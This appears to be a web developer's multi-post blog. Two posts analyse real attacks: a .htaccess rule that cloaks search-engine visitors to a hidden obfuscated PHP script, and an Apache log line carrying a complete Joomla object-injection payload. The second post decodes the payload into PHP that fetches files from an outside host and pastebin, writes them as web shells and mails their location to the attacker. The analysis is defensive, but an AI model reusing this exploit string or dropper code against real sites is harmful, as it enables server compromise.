.htaccess compromised

Screen Shot 2016-08-09 at 7.08.01 AM

A simple, clean, flat html site was recently hacked for its Search Engine referrer. Arriving at the site by typing the domain, or some secondary link, would provide the site without issue. Arriving via an SE or with an SE user agent, well, that’s a paddlin’


Here’s the .htaccess file

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ – [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ details-enforcers.php?$1 [L]

ooooh…details-enforcers.php. Sounds important! Let’s take a look:

Screen Shot 2016-08-09 at 7.15.35 AM

Hello Mr. Fancy Pants. Let’s see what you are trying to hide:

That first variable is


is fancy-speak for create_function

$qweboi = $meymun(‘$a’,strrev(‘;)a$(lave’));

becomes an anonymous function lambda_1. Then the next line we see a strrev(), because nothing is as secure as reversing a string. So lets do it: Hey, it’s an eval(base64_decode())! **sarcasm**

It is a PHP script I have put HERE. What’s funny is that they base64_encoded() a domain name in the script:


That sends content. The domain?


You know they are good because they use 1’s for i’s and zero’s for o’s.






never an Always

If you are in the Drupal world you will have seen the critical updates to several modules. One of these is in our install profile. This isn’t a matter of turning off the module either. Update, or remove.

It doesn’t take me long to clean the module out of the repo and push it up, but with well over 50 sites to maintain, I don’t have a lot of time to play. Luckily the other 50 or so sites are on multisite machines, so that’s just one code base to play with. But let’s get back to brass tacks here:

I have multiple people that commit to these sites, some in house and others the clients themselves. With all this noise, one voice always rings true: Master Can Always Be Pushed to Production.

I hear what you are saying: “Of course it can, silly!”

With that I will say: Sometimes, every now and then, when things just don’t work they way they are supposed to, when the needs of the client out-weigh the needs of community, a kitten can be killed. And if core can be hacked, then can master be not-production-ready? You betcha’.

Yes, Dorothy, it is a scary world.

So when you hear someone say that master can Always be pushed up, remember that there is never an Always.

Heckle the Jekyll

I love / love / love the idea of static pages over CMS driven systems for small sites. (Even front pages of large sites, but that is another discussion!) That being said I have been bitten by the Jekyll bug, and I’m finding it a rather annoying itch.

Another idea I love is speed. Give me a fast website and I’ll be happy. Hence the love for static sites over CMS, and all that overhead.

Back to Jekyll: For a test site I setup CloudIntel. It’s a simple site used to promote the sale of the domain (and it’s sister .net domain) and is scoring a 90 on Google’s Speed Insight. Of course that shouldn’t be that hard since it is such a simple site.

The site is hosted on Github and it’s working fine, so I guess I must change something. Let’s change everything.

Gitlab has me intrigued. Mainly the Free Private Repos. Sure, github is getting my $7/month, and I have a page, but according to the fine print regs, I can only have one page. With Gitlab I can push out small sites with glee.

Well, maybe not glee. More on that in a minute.


On a random research for speeding up a WordPress site I came across Impatient Jekyll.

Blazing fast rendering Strongly optimized so that you start with high score on Google Page Speed Insights, and an excellent SpeedIndex on webpagetest.org

Another Change

So everything seems fine.  An optimized Jekyll, a new hosting. Let’s pile on.

Add: Gulp

And now it’s broken. I think it is a gulp deploy as the hook is for github, not gitlab. Using git I can push up the site, and it all goes up, save the css. This is a common issue and has been driving me up the wall.

Looks like I’ve got some fun planned for the weekend.



WP Plugins

I was asked to do a review for a plugin and it got me thinking. Nearly every week I have a WordPress site cross my desk, usually with a security issue, and in turn I install the same plugins. I thought it would be interesting to share the couple that I use, and see if there are any favorites out there from you that you would like to share.

  1. ShortPixel
  2. Sucuri (some sites)
  3. W3 Total Cache
  4. Simple 301 Redirects & Bulk Uploader
  5. WP Database Backup (or if I can’t install a plugin)
  6. Adminer (Not a plugin)

You’ll note that Sucuri does not get put on all sites, and Adminer is not a plugin, and if is put on the site, is only temporary.

The big ones for me are ShortPixel, which is an image compressor, the W3 Total Cache and both of the 301 Redirects. These plugins help with page speed and working with the SEO team.

The Database Backup/Adminer options are there for db access. Before I do any work on a site a snapshot is taken of the db. Adminer is a stand alone PHP script for accessing MySQL databases. Yes, there are times when I only have ftp access, no plugin or otherwise access to work in the site. I can hear you “But Eric, if you have FTP can’t you ….?” You’d be surprised, just like I was when I would ftp a plugin only to have it deleted by the security software on the server. Sometimes this job is a challenge 🙂

But enough of my rambling. I’m sure I’m missing some, that I’ll add later.

What are your goto plugins?



A Startup Idea Problem

Let me start by saying I have a Startup Idea. Actually, I have many Start Up Ideas, which leads to a problem: which one do I build?

This leads to another problem. I don’t really want to build them. I like the idea’s, and would like to use the end products…but the time to build the thing, well, I have a lot on my plate and don’t really want to spend less time from family.

I have thought about building MVP’s on each of the ideas. Lay down the foundation from which empires are built. But I don’t like empires. I’m more the “Get off my lawn” than “Let’s party”.

I had the thought of selling the ideas, but I can’t even sell a domain name. Hell, www.cloudintel.com is prime and the most I was offered was $200.

Then I had an idea, one that is both brilliant and stupid. What if I give them away? I’ll build a site that over set increments of time (weekly/monthly) a new idea is presented detailing the idea, thoughts on its construction and income channels.

Genius! Of course, as with any venture, it must be cleared by the CEO (my wife).

So, if you feel this is a great idea, leave a comment I can use as part of my presentation to make is so. If it is a bad idea, just tell me I’m daft.


Hmmm…what do we have here?

Screen Shot 2016-05-11 at 10.00.23 AM As you can probably see here with the screen shot of an Apache access log, and the overview shows something a bit off. All those individual lines peppered by those wide blocks there in the middle. They stand out like sore thumbs, don’t they?

Let’s take a closer look.


1×2.1×7.1×9.1×2 – – [11/May/2016:07:52:42 +0000] “GET /login HTTP/1.0” 200 3138 “-” “}__test|O:21:\”JDatabaseDriverMysqli\”:3:{s:2:\”fc\”;O:17:\”JSimplepieFactory\”:0:{}s:21:\”\\0\\0\\0disconnectHandlers\”;a:1:{i:0;a:2:{i:0;O:9:\”SimplePie\”:5:{s:8:\”sanitize\”;O:20:\”JDatabaseDriverMysql\”:0:{}s:8:\”feed_url\”;s:3738:\”eval(base64_decode(‘JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEveHh4eC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDIxbFpHbGhMMk56Y3k1d2FIQWlJRHNOQ2lSMFpYaDBJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl0Y25SbkxuVnBMbkJvYVc1dFlTNWxaSFV1Y0dndlkyOXRjRzl1Wlc1MGN5OXFiMjl0YkdFdWRIaDBKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJwdFlXbHNMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5cWJXRnBiSG91ZEhoMEp5azdEUW9rYjNCbGJqSWdQU0JtYjNCbGJpZ2tZMmhsWTJzeUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNHVnVNaXdnSkhSbGVIUXlLVHNOQ21aamJHOXpaU2drYjNCbGJqSXBPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR05vWldOck1pa3BldzBLSUNBZ0lHVmphRzhnSkdOb1pXTnJNaTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeklpT3cwS1pXTm9ieUFpWkc5dVpUSWdMbHh1SUNJZ093MEtEUW9rWTJobFkyc3pQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDBndWFIUnRJaUE3RFFva2RHVjRkRE1nUFNCb2RIUndYMmRsZENnbkp5azdEUW9rYjNBelBXWnZjR1Z1S0NSamFHVmphek1zSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3TXl3a2RHVjRkRE1wT3cwS1ptTnNiM05sS0NSdmNETXBPdzBLRFFva1kyaGxZMnMwUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJOb1pXTnJMbkJvY0NJZ093MEtKSFJsZUhRMElEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5eGNTNTBlSFFuS1RzTkNpUnZjRFE5Wm05d1pXNG9KR05vWldOck5Dd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTBMQ1IwWlhoME5DazdEUXBtWTJ4dmMyVW9KRzl3TkNrN0RRb05DaVJqYUdWamF6VTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2TDIxbFpHbGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmJYSjBaeTUxYVM1d2FHbHViV0V1WldSMUxuQm9MMk52YlhCdmJtVnVkSE12Y1hGNkxuUjRkQ2NwT3cwS0pHOXdOVDFtYjNCbGJpZ2tZMmhsWTJzMUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEVXNKSFJsZUhRMUtUc05DbVpqYkc5elpTZ2tiM0ExS1RzTkNnMEtKR05vWldOck5qMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0lpT3cwS0pITjFZbXBsWTNRZ1BTQW5TbTl0SUhwNmVpQW5JQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9rYUdWaFpHVnlJRDBnSjJaeWIyMDZJRXRsYTJ0aGFTQlRaVzV6Wlc0Z1BIWnZibEpsYVc1b1pYSjZTMnhoZFhOQVUyRnBhMjkxYm1GSWFXSnBMbU52YlQ0bklDNGdJbHh5WEc0aU93MEtKRzFsYzNOaFoyVWdQU0FpVTJobGJHeDZJRG9nYUhSMGNEb3ZMeUlnTGlBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDA1QlRVVW5YU0F1SUNJdmJHbGljbUZ5YVdWekwycHZiMjFzWVM5cWJXRnBiQzV3YUhBL2RTSWdMaUFpWEhKY2JpSWdMaUJ3YUhCZmRXNWhiV1VvS1NBdUlDSmNjbHh1SWpzTkNpUnpaVzUwYldGcGJDQTlJRUJ0WVdsc0tDUjBiM29zSUNSemRXSnFaV04wTENBa2JXVnpjMkZuWlN3Z0pHaGxZV1JsY2lrN0RRb05Da0IxYm14cGJtc29YMTlHU1V4RlgxOHBPdzBLRFFvTkNqOCsnKSk7DQpmY2xvc2UoJGZwKTs=’));JFactory::getConfig();exit\”;s:19:\”cache_name_function\”;s:6:\”assert\”;s:5:\”cache\”;b:1;s:11:\”cache_class\”;O:20:\”JDatabaseDriverMysql\”:0:{}}i:1;s:4:\”init\”;}}s:13:\”\\0\\0\\0connection\”;b:1;}\xf0\xfd\xfd\xfd” vhost=ala.devcloud.acquia-sites.com host=www.website.org hosting_site=ala pid=1219 request_time=158579 request_id=”v-578582fe-174d-11e6-a036-22000a1e875f”

Someone is sending a large block of data into my server. Let’s take a closer look.

Using <?php echo base64_decode(‘allthatcrap’); ?> I get:

$check = $_SERVER[‘DOCUMENT_ROOT’] . “/media/xxxx.php” ;

So, looking for a file xxxx.php in the media directory, are we?

Let’s decode the rest of the package.


function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
$check = $_SERVER[‘DOCUMENT_ROOT’] . “/media/css.php” ;
$text = http_get(‘http://mrtg.ui.phinma.edu.ph/components/joomla.txt&#8217;);
$open = fopen($check, ‘w’);
fwrite($open, $text);
echo $check.””;
echo “not exits”;
echo “done .\n ” ;
$check2 = $_SERVER[‘DOCUMENT_ROOT’] . “/media/jmail.php” ;
$text2 = http_get(‘http://mrtg.ui.phinma.edu.ph/components/jmailz.txt&#8217;);
$open2 = fopen($check2, ‘w’);
fwrite($open2, $text2);
echo $check2.””;
echo “not exits2”;
echo “done2 .\n ” ;

$check3=$_SERVER[‘DOCUMENT_ROOT’] . “/H.htm” ;
$text3 = http_get(”);
$op3=fopen($check3, ‘w’);

$check4=$_SERVER[‘DOCUMENT_ROOT’] . “/media/check.php” ;
$text4 = http_get(‘http://mrtg.ui.phinma.edu.ph/components/qq.txt&#8217;);
$op4=fopen($check4, ‘w’);

$check5=$_SERVER[‘DOCUMENT_ROOT’] . “//media/jmails.php” ;
$text5 = http_get(‘http://mrtg.ui.phinma.edu.ph/components/qqz.txt&#8217;);
$op5=fopen($check5, ‘w’);

$check6=$_SERVER[‘DOCUMENT_ROOT’] . “/libraries/joomla/session/session.php” ;
$text6 = http_get(‘http://pastebin.com/raw/UHAGT887&#8217;);
$op6=fopen($check6, ‘w’);

$toz = “”;
$subject = ‘Jom zzz ‘ . $_SERVER[‘SERVER_NAME’];
$header = ‘from: Kekkai Sensen <vonReinherzKlaus@SaikounaHibi.com>’ . “\r\n”;
$message = “Shellz : http://&#8221; . $_SERVER[‘SERVER_NAME’] . “/libraries/joomla/jmail.php?u” . “\r\n” . php_uname() . “\r\n”;
$sentmail = @mail($toz, $subject, $message, $header);


Well, well, well…looking to hack a Joomla site, huh?

Anyway…nothing to see here folks. No Joomla site….but watch the logs!

Another Day in WordPress

So, this was a fun one. For starters it wasn’t a hacked site, so I’ll be eternally grateful for this. What it was was a non-Wordpress/Wordpress site.

Yeah, it threw me as well.

For starters there are two sites; flat php files and a WP site in the /blog directory which is navigated to via a subdomain.  The front page was a mimic of the the WP theme, with SimplePie object gathering from an RSS feed of the WP site for a loop that shows blog posts within the blog.

Confused yet?

Now, I can certainly understand the front page being a flat file, or in this case a headless WP, the speed alone you gain for SEO and mobile is worth the effort.

However, and I know this is a small stretch, but I feel it is worth asking. Please, if you are working on a project like this, outside the normal paradigm of the application, please leave some notes. It doesn’t have to be much, but understand just because you built it doesn’t mean you will be maintaining it. Companies loose contract, people move on.

This is just a simple plea, because, in case you didn’t know, in time you will be on this side of the fence, and you’ll know exactly what I’m talking about.